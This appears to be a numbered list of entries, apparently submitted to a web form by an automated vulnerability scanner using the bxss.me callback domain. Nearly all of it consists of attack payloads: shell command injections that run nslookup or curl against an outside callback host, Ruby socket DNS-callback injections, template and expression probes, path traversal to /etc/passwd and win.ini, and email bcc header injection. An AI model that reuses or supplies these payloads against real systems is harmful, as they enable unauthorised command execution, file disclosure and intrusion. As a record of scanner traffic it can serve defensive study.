754.
755.
756. $(nslookup -q=cname hitrpvnhtkbemc1989.bxss.me||curl hitrpvnhtkbemc1989.bxss.me)
757. (nslookup -q=cname hitabnmhauggad12e7.bxss.me||curl hitabnmhauggad12e7.bxss.me))
758.
759.
/\xfs.bxss.me?gov.vn
760.
761.
QA_Add/.
762.
//xfs.bxss.me?gov.vn
763.
bxss.me
764.
c:/windows/win.ini
765.
766.
QA_Add
767.
768. |echo mgmkez$()\ kmclsd\nz^xyu||a #' |echo mgmkez$()\ kmclsd\nz^xyu||a #|" |echo mgmkez$()\ kmclsd\nz^xyu||a #
769.
770.
QA_Add
771.
/etc/shells
772. &echo oscmsh$()\ aynplz\nz^xyu||a #' &echo oscmsh$()\ aynplz\nz^xyu||a #|" &echo oscmsh$()\ aynplz\nz^xyu||a #
773.
774.
xfs.bxss.me?gov.vn
775. echo uakvub$()\ cyvzxs\nz^xyu||a #' &echo uakvub$()\ cyvzxs\nz^xyu||a #|" &echo uakvub$()\ cyvzxs\nz^xyu||a #
776.
http://xfs.bxss.me?gov.vn
777.
http://bxss.me/t/fit.txt?.jpg
778. '+'A'.concat(70-3).concat(22*4).concat(116).concat(72).concat(100).concat(89)+(require'socket' Socket.gethostbyname('hitip'+'jyjgaepj19e93.bxss.me.')[3].to_s)+'
779.
780. "+"A".concat(70-3).concat(22*4).concat(114).concat(82).concat(101).concat(79)+(require"socket" Socket.gethostbyname("hitya"+"fnblfnbv273a0.bxss.me.")[3].to_s)+"
781.
782.
783.
981807
784.
Http://bxss.me/t/fit.txt
785.
xfs.bxss.me
786.
787.
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
788.
789. ^(#$!@#$)(()))******
790.
791. '"
792.
793.
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
794. "+response.write(9309200*9787908)+"
795.
'+'A'.concat(70-3).concat(22*4).concat(118).concat(87).concat(105).concat(65)+(require'socket' Socket.gethostbyname('hitux'+'ggivtfxm0489a.bxss.me.')[3].to_s)+'
796. !(()&&!|*|*|
797. bxss.me/t/xss.html?%00
798.
"+"A".concat(70-3).concat(22*4).concat(111).concat(83).concat(118).concat(79)+(require"socket" Socket.gethostbyname("hitwr"+"amnaunqg532a7.bxss.me.")[3].to_s)+"
799. '+response.write(9309200*9787908)+'
800. HttP://bxss.me/t/xss.html?%00
801. )
802.
803. response.write(9309200*9787908)
804.
bxss.me/t/xss.html?%00
805.
HttP://bxss.me/t/xss.html?%00
806.
807.
'"
808.
^(#$!@#$)(()))******
809.
"+response.write(9129931*9431887)+"
810.
811.
'+response.write(9129931*9431887)+'
812.
response.write(9129931*9431887)
813.
!(()&&!|*|*|
814.
815.
816.
)
817.
;(nslookup -q=cname hituuunxajddp441dc.bxss.me||curl hituuunxajddp441dc.bxss.me)|(nslookup -q=cname hituuunxajddp441dc.bxss.me||curl hituuunxajddp441dc.bxss.me)&(nslookup -q=cname hituuunxajddp441dc.bxss.me||curl hituuunxajddp441dc.bxss.me)
818. ctime sleep p0 (I30 tp1 Rp2 .
819.
820.
ctime sleep p0 (I30 tp1 Rp2 .
821.
`(nslookup -q=cname hitxsxvpkwikud06cd.bxss.me||curl hitxsxvpkwikud06cd.bxss.me)`
822.
823.
824.
|(nslookup -q=cname hitqdowywjssic47d8.bxss.me||curl hitqdowywjssic47d8.bxss.me)
825.
826.
&(nslookup -q=cname hitlsouwgrarmdef29.bxss.me||curl hitlsouwgrarmdef29.bxss.me)&'\"`0&(nslookup -q=cname hitlsouwgrarmdef29.bxss.me||curl hitlsouwgrarmdef29.bxss.me)&`'
827.
828.
829.
830.
831.
&nslookup -q=cname hitomolquryzofe8de.bxss.me&'\"`0&nslookup -q=cname hitomolquryzofe8de.bxss.me&`'
832.
833. 12345'"\'\");|]*{ <>�''💡
834.
$(nslookup -q=cname hitoupmsnboxsfdcf8.bxss.me||curl hitoupmsnboxsfdcf8.bxss.me)
835.
(nslookup -q=cname hitrkzjdjvggwee930.bxss.me||curl hitrkzjdjvggwee930.bxss.me))
836.
837.
838.
839.
|echo jlqeyj$()\ zyoybj\nz^xyu||a #' |echo jlqeyj$()\ zyoybj\nz^xyu||a #|" |echo jlqeyj$()\ zyoybj\nz^xyu||a #
840.
841.
842.
&echo wxjzoi$()\ hwiqgh\nz^xyu||a #' &echo wxjzoi$()\ hwiqgh\nz^xyu||a #|" &echo wxjzoi$()\ hwiqgh\nz^xyu||a #
843.
844.
845.
echo uczpev$()\ wzpcyv\nz^xyu||a #' &echo uczpev$()\ wzpcyv\nz^xyu||a #|" &echo uczpev$()\ wzpcyv\nz^xyu||a #
846.
847.
848.
849. ${9999459+9999689}
850.
12345'"\'\");|]*{ <>�''💡
851.
852.
${9999373+10000364}
853.
854.
855. ../
856. /../../../../../../../../../../windows/system32/BITSADMIN.exe
857.
858.
859.
860.
/../../../../../../../../../../windows/system32/BITSADMIN.exe
861.
862.
863.
864.
865. file:///etc/passwd
866.
867. ../../../../../../../../../../../../../../windows/win.ini
868. ../../../../../../../../../../../../../../etc/passwd
869.
870.
871.
872.
873.
874.
875. 1BDfsLILa8O
876. to@example.com> bcc:0.216-173931.216.7e0f8.19789.2@bxss.me
877. bcc:0.216-173930.216.7e0f8.19789.2@bxss.me
878.
1BXF5pe60xO
879.
880.
to@example.com> bcc:0.216-173927.216.7e0f8.19789.2@bxss.me
881.
882.
bcc:0.216-173926.216.7e0f8.19789.2@bxss.me
883.
884.
885. @@lVXmX
886. @@N5Ekc
887. @@tYK5o